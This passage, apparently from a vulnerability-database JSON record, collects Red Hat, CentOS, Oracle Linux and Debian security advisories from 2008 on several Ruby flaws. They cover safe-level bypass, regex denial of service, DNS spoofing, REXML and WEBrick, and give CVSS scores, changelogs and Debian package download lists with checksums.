audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:34", "bulletinFamily": "unix", "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2018-03-14T19:26:59", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0895", "href": "https://access.redhat.com/errata/RHSA-2008:0895", "type": "redhat", "title": "(RHSA-2008:0895) Moderate: ruby security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:15", "bulletinFamily": "unix", "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-07-28T18:43:40", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0896", "href": "https://access.redhat.com/errata/RHSA-2008:0896", "type": "redhat", "title": "(RHSA-2008:0896) Moderate: ruby security update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:46:40", "bulletinFamily": "unix", "description": "Ruby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.", "modified": "2017-09-08T11:51:21", "published": "2008-10-21T04:00:00", "id": "RHSA-2008:0897", "href": "https://access.redhat.com/errata/RHSA-2008:0897", "type": "redhat", "title": "(RHSA-2008:0897) Moderate: ruby security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2019-05-29T18:35:30", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2008:0895-02\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015336.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-libs\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "modified": "2008-10-22T04:31:37", "published": "2008-10-22T04:31:37", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015336.html", "id": "CESA-2008:0895-02", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:58", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2008:0896\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015343.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015347.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-libs\nruby-mode\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0896.html", "modified": "2008-10-24T18:02:11", "published": "2008-10-21T16:06:28", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015332.html", "id": "CESA-2008:0896", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:20", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2008:0897\n\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\nand a fixed source port when sending DNS requests. A remote attacker could\nuse this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n\nRuby's XML document parsing module (REXML) was prone to a denial of service\nattack via XML documents with large XML entity definitions recursion. A\nspecially-crafted XML file could cause a Ruby application using the REXML\nmodule to use an excessive amount of CPU and memory. (CVE-2008-3790)\n\nAn insufficient \"taintness\" check flaw was discovered in Ruby's DL module,\nwhich provides direct access to the C language functions. An attacker could\nuse this flaw to bypass intended safe-level restrictions by calling\nexternal C functions with the arguments from an untrusted tainted inputs.\n(CVE-2008-3657)\n\nA denial of service flaw was discovered in WEBrick, Ruby's HTTP server\ntoolkit. A remote attacker could send a specially-crafted HTTP request to a\nWEBrick server that would cause the server to use an excessive amount of\nCPU time. (CVE-2008-3656)\n\nA number of flaws were found in the safe-level restrictions in Ruby. It\nwas possible for an attacker to create a carefully crafted malicious script\nthat can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression engine. If\na Ruby script tried to process a large amount of data via a regular\nexpression, it could cause Ruby to enter an infinite-loop and crash.\n(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015340.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015341.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015345.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015349.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015354.html\nhttp://lists.centos.org/pipermail/centos-announce/2008-October/015355.html\n\n**Affected packages:**\nirb\nruby\nruby-devel\nruby-docs\nruby-irb\nruby-libs\nruby-mode\nruby-rdoc\nruby-ri\nruby-tcltk\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2008-0897.html", "modified": "2008-10-28T10:37:20", "published": "2008-10-24T00:04:31", "href": "http://lists.centos.org/pipermail/centos-announce/2008-October/015340.html", "id": "CESA-2008:0897", "title": "irb, ruby security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:25", "bulletinFamily": "unix", "description": "[1.6.8-13.el3]\n- security fixes. (#461578)\n- CVE-2008-3655: multiple insufficient safe mode restrictions\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine (remotely exploitable DoS)\n- CVE-2008-3905: use of predictable source port and transaction\n id in DNS requests done by resolve.rb module.", "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0896", "href": "http://linux.oracle.com/errata/ELSA-2008-0896.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:03", "bulletinFamily": "unix", "description": "[1.8.5-5.el5_2.5]\n- Build with -fno-strict-aliasing.\n[1.8.5-5.el5_2.4]\n- security fixes. (#461590)\n- CVE-2008-3655: multiple insufficient safe mode restrictions.\n- CVE-2008-3656: WEBrick DoS vulnerability (CPU consumption).\n- CVE-2008-3657: missing taintness checks in dl module.\n- CVE-2008-3905: use of predictable source port and transaction id in DNS\n requests done by resolv.rb module.\n- CVE-2008-3443: Memory allocation failure in Ruby regex engine\n (remotely exploitable DoS).\n- CVE-2008-3790: DoS vulnerability in the REXML module.", "modified": "2008-10-21T00:00:00", "published": "2008-10-21T00:00:00", "id": "ELSA-2008-0897", "href": "http://linux.oracle.com/errata/ELSA-2008-0897.html", "title": "ruby security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:49", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1695-1 security@debian.org\nhttp://www.debian.org/security/ Florian Weimer\nJanuary 02, 2009 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : ruby1.8, ruby1.9\nVulnerability : memory leak\nProblem type : local (remote)\nDebian-specific: no\nCVE Id(s) : CVE-2008-3443\nDebian Bug : 494401\n\nThe regular expression engine of Ruby, a scripting language, contains a\nmemory leak which can be triggered remotely under certain circumstances,\nleading to a denial of service condition (CVE-2008-3443).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.\n\nFor the stable distribution (etch), this problem has been fixed in version\n1.8.5-4etch4 of the ruby1.8 package, and version 1.9.0+20060609-1etch4\nof the ruby1.9 package.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.8.7.72-1 of the ruby1.8 package. The ruby1.9 package will be\nfixed soon.\n\nWe recommend that you upgrade your Ruby packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5.orig.tar.gz\n Size/MD5 checksum: 4434227 aae9676332fcdd52f66c3d99b289878f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.dsc\n Size/MD5 checksum: 1102 1c38e939e74513153ee6677ef9f85b0d\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.diff.gz\n Size/MD5 checksum: 176939 2fea21ebd5e29d26714843fa415d6310\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4.diff.gz\n Size/MD5 checksum: 32843 859c9ba559722e156d6931f3c8c347a4\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609.orig.tar.gz\n Size/MD5 checksum: 4450198 483d9b46a973c7e14f7586f0b1129891\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4.dsc\n Size/MD5 checksum: 1379 cbcf9f41397f2658e1db5ebae0178ccd\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-examples_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 265870 fc302abc0465ab56ccd16fc0e724885c\n http://security.debian.org/pool/updates/main/r/ruby1.9/irb1.9_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 255764 40a840e93b23abfe83f06fb68e411ecc\n http://security.debian.org/pool/updates/main/r/ruby1.8/rdoc1.8_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 309788 1a32b37a2ae266825239d31479481202\n http://security.debian.org/pool/updates/main/r/ruby1.8/ri1.8_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 1232694 0f2de56be8bf69925bdd69c0ebdb6e88\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-elisp_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 229450 c445df6488d98bba432cad422b2d26d2\n http://security.debian.org/pool/updates/main/r/ruby1.9/ri1.9_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 694310 ba20a22e37fe3128ba68065e81b34be2\n http://security.debian.org/pool/updates/main/r/ruby1.9/rdoc1.9_1.9.0+20060609-1etch4_all.deb\n Size/MD5 checksum: 318608 107093187b68a01e89937e5595ada72f\n http://security.debian.org/pool/updates/main/r/ruby1.8/irb1.8_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 235540 742511548e73ce861aec2ebced3bb820\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-elisp_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 210174 3f151d4c5e251849b7bc82a4c0cc6717\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-examples_1.8.5-4etch4_all.deb\n Size/MD5 checksum: 243302 af6b1eacf4c03bc3fe53e3c2a8e13044\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 199212 7450977513c7006dd667426d5499092c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 324692 f53f9acfd76ea3a29a8ef4892f2b573a\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 237774 e9a60d0d7c8f73357b09bb6188070e21\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 217606 1479ee1a4b51cb0a75783b2f3844723b\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 219472 952a4e672625ce7f2529493b00364604\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 301142 fb710ce9d21ff1fb7f8a3808fcb78d60\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 216946 515718544ab0101093c6a57e63cb1cb8\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 903520 d39e018101c51c880e2cd9895a88a1f8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 961022 f6d226e51af5740c5bda5772cf20e8a8\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 217630 292a9b82a47bd1bc3c7b4ab440029cca\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 198300 653c076799344535ac9b6a791ffb132d\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 1881422 2eb8f5dd96ced6eac7473eed467c5663\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 1869092 3d45f58f803de6208f28d5267be89ecf\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 199236 81f0b4078e9412536836f8b973756318\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 1074308 f3ec5b9b0349dbc5ef735942a997327c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 1890052 5779555b10f64a438773cbf048ac545c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_alpha.deb\n Size/MD5 checksum: 340202 69dd9f78aca79c5e05b191d7163a01b4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_alpha.deb\n Size/MD5 checksum: 1638634 ed825a333226565b4b98b32b93cd1fe6\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 807592 464c13292ce358b22247cc998f743562\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 216630 867bdeff043830d6bad157d1931dc948\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 235632 c4ad4cb0bb9cd697534a2c262100c6cc\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 198112 17cd7156a45a5aff5c27d82e268a3c4d\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 1070604 1bddf59e7b60371ff8099b08bf75ac30\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 1850656 aa571b58631a8557f7019d592636f481\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 749162 af403f99a95355682a54909929e5199a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 216080 a43f4b0559aa2c9b50ea5d7973162aa2\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 197652 a9e00dc85e9f2cae38eb09e899130248\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 217322 9e02a9f097c955e4400812f0c04d7508\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 1830274 53805790080b4cd1daf1a4d63ed8256c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 1878288 01c7b13369a8758303404727fea129fd\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 301112 987113850c63d29874841e5faff83d89\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 198726 4d65ce2e10feab441a946a18023daf42\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 216568 93fe5252d04959e64dc6576d95b7c2b6\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_amd64.deb\n Size/MD5 checksum: 1584216 69ed7f6bca37c0c549bf528f773e2900\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 323450 5baea37cc897959fc20d48ac89de0d74\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_amd64.deb\n Size/MD5 checksum: 345864 c39d9b07d0cb6e4099ca3efeafb5fa6e\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 1526984 0e6ab8221858243c7145bbc41ecb4e8f\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 365056 66c7f98e2bb319a62ee7c4c92672c731\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 196710 9e8c6e4cb718dc719e8fde6b26f962e4\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 991516 14a9b5cbf719d62dc8353a51afb555a9\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 1859122 e0c7c1e7d2ccf0e49bce45e7e7bf1278\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 1792772 d56d498189d5406b5020d9d924117e7c\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 197418 d26ec8fb413c9ebab080bedea93722b1\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 197808 a36c730da4bcea2d72f5d370322eb30f\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 792994 579ec1a30cd9a1cbd8bf67aa06dc4d24\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 697246 ca45d9a326d51f5434d1621abcece266\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 216240 423493a419191c35b8b3e80a1f1f1c9c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 216324 a266f8778f5e7d613db6ba3f15adb763\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 237202 5fc7e98291401cd3fe917ed05d9bd015\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 287576 eced197b837fe4d62c03b20bed6815be\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 1876264 bc351c3337a5d5987f6ddb836768922e\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_arm.deb\n Size/MD5 checksum: 219386 3f0b1eb14311c982d63ebd0fab64f5f4\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 215572 2c0ccc988ac6ea3250f8dc367ccaa2a2\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_arm.deb\n Size/MD5 checksum: 311564 8dfe07d2f7dcf8275e8ad8f41dcda0c0\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 218160 513b9ae768f77d80a13fa851e1c8f4f7\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8-dev_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 824152 6146a8f873531c0ed8cf0d06d2e17d2c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9-dbg_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 395602 6cc76b78245992c6a68b9e078ae89d53\n http://security.debian.org/pool/updates/main/r/ruby1.8/libreadline-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 199900 d70a4e3bc2ced6217727543e7fe0f9b0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libopenssl-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 316214 4e6641aa45421ffab8b99ab8a9e8d16a\n http://security.debian.org/pool/updates/main/r/ruby1.9/libgdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 217620 85109a63b0b20068f6320cda8f3ec6ad\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 237090 a3d1415f5a1ad8238d56b050975189e9\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 200304 783f82fe9eac7aa259a35479cc2a47e7\n http://security.debian.org/pool/updates/main/r/ruby1.9/libtcltk-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 1880858 9ab71d7b85b97c1f2d2aa3500b9ce7c1\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8-dbg_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 1040322 02afc219d2b174b059881ec0a83356fc\n http://security.debian.org/pool/updates/main/r/ruby1.9/libruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 1861536 432efb1fffc5c2b1d9cc7b74ae7baa39\n http://security.debian.org/pool/updates/main/r/ruby1.8/libdbm-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 199202 84de055812481012c4876c17833ce3b0\n http://security.debian.org/pool/updates/main/r/ruby1.8/libtcltk-ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 1869258 834f2dbf84ab6697d7980d3658290cfd\n http://security.debian.org/pool/updates/main/r/ruby1.8/ruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 219214 801a3641d72145d568a6c0c88ef43bd8\n http://security.debian.org/pool/updates/main/r/ruby1.9/ruby1.9-dev_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 888950 464ded03bf97abbc0d417b089fa87d60\n http://security.debian.org/pool/updates/main/r/ruby1.9/libdbm-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 217980 2535726a60b609b1a55fc310328df532\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_hppa.deb\n Size/MD5 checksum: 1677084 d5b606c636b8cd27143ce002d0ed2ce9\n http://security.debian.org/pool/updates/main/r/ruby1.9/libopenssl-ruby1.9_1.9.0+20060609-1etch4_hppa.deb\n Size/MD5 checksum: 333772 38a4c8fef89fde902a0be85e59fe8a8f\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/r/ruby1.8/libgdbm-ruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 197974 e282a6d8268ef83c156a860fb8a16a7c\n http://security.debian.org/pool/updates/main/r/ruby1.9/libreadline-ruby1.9_1.9.0+20060609-1etch4_i386.deb\n Size/MD5 checksum: 216404 82cf3992d705f2e9b88a915e352ca934\n http://security.debian.org/pool/updates/main/r/ruby1.8/libruby1.8_1.8.5-4etch4_i386.deb\n Size/MD5 checksum: 1530904 7f21db178c88933c5e077890402de73f\n 